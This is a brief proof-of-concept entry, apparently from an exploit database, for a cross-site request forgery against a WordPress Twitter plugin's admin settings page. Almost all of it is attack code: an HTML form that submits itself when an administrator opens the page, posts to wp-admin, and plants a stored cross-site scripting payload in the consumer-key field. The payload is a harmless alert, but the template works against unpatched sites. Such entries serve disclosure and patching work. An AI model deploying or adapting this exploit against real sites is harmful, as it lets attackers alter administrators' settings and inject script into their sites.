Share
## https://sploitus.com/exploit?id=WPEX-ID:26DEAA7C-E331-42A0-9310-31D08871154C
Have an admin open an HTML page containing the following:
```
<form action="http://example.com/wordpress/wp-admin/admin.php?page=mtb_menu" method="POST">
<input type="text" name="twitter_mtb_consumer_key" value='"><img src=x onerror=alert(1)>'>
<input type="text" name="twitter_mtb_consumer_secret" value="1">
<input type="text" name="twitter_mtb_access_token" value="1">
<input type="text" name="twitter_mtb_access_token_secret" value="1">
<input type="text" name="mtb" value="true">
</form>
<script>
document.forms[0].submit();
</script>
```